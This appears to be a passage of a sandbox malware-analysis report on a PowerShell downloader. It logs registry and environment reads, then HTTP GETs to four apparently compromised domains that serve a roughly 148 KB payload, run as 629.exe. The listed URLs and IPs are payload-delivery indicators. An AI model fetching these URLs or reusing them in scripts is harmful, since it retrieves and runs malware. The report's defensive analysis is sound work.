| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\629.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe, size = 260 |
|
2 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Release | - |
|
3 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (125)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
117 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = userprofile, result_out = C:\Users\aETAdzjz |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = neumaticosutilizados.com, address_out = 109.237.222.235 |
|
1 | |
| Resolve Name | host = whiskyshipper.com, address_out = 68.183.118.18 |
|
1 | |
| Resolve Name | host = geestdriftnu.com, address_out = 185.182.56.77 |
|
1 | |
| Resolve Name | host = matex.biz, address_out = 46.242.164.79 |
|
1 |
TCP Sessions (4)
| Information | Value |
|---|---|
| Total Data Sent | 587 bytes |
| Total Data Received | 148.69 KB |
| Contacted Host Count | 4 |
| Contacted Hosts | 109.237.222.235:80, 68.183.118.18:80, 185.182.56.77:80, 46.242.164.79:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x4d4 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 109.237.222.235 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49163 |
| Data Sent | 149 bytes |
| Data Received | 998 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 109.237.222.235, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 86, size_out = 86 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 519 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 63, size_out = 63 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 479 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #2
| Information | Value |
|---|---|
| Handle | 0x508 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 68.183.118.18 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49164 |
| Data Sent | 173 bytes |
| Data Received | 1.99 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 68.183.118.18, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 98, size_out = 98 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 642 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 75, size_out = 75 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 1399 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #3
| Information | Value |
|---|---|
| Handle | 0x510 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 185.182.56.77 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49165 |
| Data Sent | 145 bytes |
| Data Received | 855 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 185.182.56.77, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 84, size_out = 84 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 517 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 61, size_out = 61 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 338 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #4
| Information | Value |
|---|---|
| Handle | 0x4e4 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 46.242.164.79 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49166 |
| Data Sent | 120 bytes |
| Data Received | 144.89 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 46.242.164.79, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 72, size_out = 72 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 389 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 12327, size_out = 9044 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3283, size_out = 3283 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
6 | |
| Receive | flags = NO_FLAG_SET, size = 16384, size_out = 16384 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
6 | |
| Receive | flags = NO_FLAG_SET, size = 16384, size_out = 10977 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5407, size_out = 5407 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
6 | |
| Receive | flags = NO_FLAG_SET, size = 16384, size_out = 16384 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
7 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 33672 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 48689, size_out = 3472 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 45217, size_out = 3828 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 41389, size_out = 16060 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 25329, size_out = 25329 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
3 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (8)
| Information | Value |
|---|---|
| Total Data Sent | 587 bytes |
| Total Data Received | 148.69 KB |
| Contacted Host Count | 4 |
| Contacted Hosts | neumaticosutilizados.com, whiskyshipper.com, geestdriftnu.com, matex.biz |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | neumaticosutilizados.com |
| Server Port | 80 |
| Data Sent | 86 |
| Data Received | 519 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = neumaticosutilizados.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /1TI81PRQLORR |
|
1 | |
| Send HTTP Request | headers = host: neumaticosutilizados.com, connection: Keep-Alive, url = neumaticosutilizados.com/1TI81PRQLORR |
|
1 | |
| Read Response | size = 4096, size_out = 519 |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| Server Name | neumaticosutilizados.com |
| Server Port | 80 |
| Data Sent | 63 |
| Data Received | 479 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = neumaticosutilizados.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /1TI81PRQLORR/ |
|
1 | |
| Send HTTP Request | headers = host: neumaticosutilizados.com, url = neumaticosutilizados.com/1TI81PRQLORR/ |
|
1 | |
| Read Response | size = 4096, size_out = 479 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #3
| Information | Value |
|---|---|
| Server Name | whiskyshipper.com |
| Server Port | 80 |
| Data Sent | 98 |
| Data Received | 642 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = whiskyshipper.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/A8BRS9sLl8i_P8DBsLho |
|
1 | |
| Send HTTP Request | headers = host: whiskyshipper.com, connection: Keep-Alive, url = whiskyshipper.com/wp-content/A8BRS9sLl8i_P8DBsLho |
|
1 | |
| Read Response | size = 4096, size_out = 642 |
|
1 |
HTTP Session #4
| Information | Value |
|---|---|
| Server Name | whiskyshipper.com |
| Server Port | 80 |
| Data Sent | 75 |
| Data Received | 1399 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = whiskyshipper.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/A8BRS9sLl8i_P8DBsLho/ |
|
1 | |
| Send HTTP Request | headers = host: whiskyshipper.com, url = whiskyshipper.com/wp-content/A8BRS9sLl8i_P8DBsLho/ |
|
1 | |
| Read Response | size = 4096, size_out = 1399 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #5
| Information | Value |
|---|---|
| Server Name | geestdriftnu.com |
| Server Port | 80 |
| Data Sent | 84 |
| Data Received | 517 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = geestdriftnu.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /gqXb3ghkRZJ6tjL8_Y |
|
1 | |
| Send HTTP Request | headers = host: geestdriftnu.com, connection: Keep-Alive, url = geestdriftnu.com/gqXb3ghkRZJ6tjL8_Y |
|
1 | |
| Read Response | size = 4096, size_out = 517 |
|
1 |
HTTP Session #6
| Information | Value |
|---|---|
| Server Name | geestdriftnu.com |
| Server Port | 80 |
| Data Sent | 61 |
| Data Received | 338 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = geestdriftnu.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /gqXb3ghkRZJ6tjL8_Y/ |
|
1 | |
| Send HTTP Request | headers = host: geestdriftnu.com, url = geestdriftnu.com/gqXb3ghkRZJ6tjL8_Y/ |
|
1 | |
| Read Response | size = 4096, size_out = 338 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #7
| Information | Value |
|---|---|
| Server Name | matex.biz |
| Server Port | 80 |
| Data Sent | 72 |
| Data Received | 389 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = matex.biz, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = //RQR0RaohiR_P |
|
1 | |
| Send HTTP Request | headers = host: matex.biz, connection: Keep-Alive, url = matex.biz//RQR0RaohiR_P |
|
1 | |
| Read Response | size = 4096, size_out = 389 |
|
1 |
HTTP Session #8
| Information | Value |
|---|---|
| Server Name | matex.biz |
| Server Port | 80 |
| Data Sent | 48 |
| Data Received | 147976 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = matex.biz, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /RQR0RaohiR_P/ |
|
1 | |
| Send HTTP Request | headers = host: matex.biz, url = matex.biz/RQR0RaohiR_P/ |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 12327, size_out = 9044 |
|
1 | |
| Read Response | size = 3283, size_out = 3283 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 16384, size_out = 16384 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 16384, size_out = 10977 |
|
1 | |
| Read Response | size = 5407, size_out = 5407 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
6 | |
| Read Response | size = 16384, size_out = 16384 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
7 | |
| Read Response | size = 65536, size_out = 33672 |
|
1 | |
| Read Response | size = 48689, size_out = 3472 |
|
1 | |
| Read Response | size = 45217, size_out = 3828 |
|
1 | |
| Read Response | size = 41389, size_out = 16060 |
|
1 | |
| Read Response | size = 25329, size_out = 25329 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
3 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Close Session | - |
|
1 |
Process #5: 629.exe
31
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\aetadzjz\629.exe |
| Command Line | "C:\Users\aETAdzjz\629.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:01:17, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb3c |
| Parent PID | 0xa78 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x00379fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x00399fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003bffff | Private Memory | rwx |
|
|
|
- |
| 629.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00980fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000990000 | 0x00990000 | 0x01d8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01d90000 | 0x0205efff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
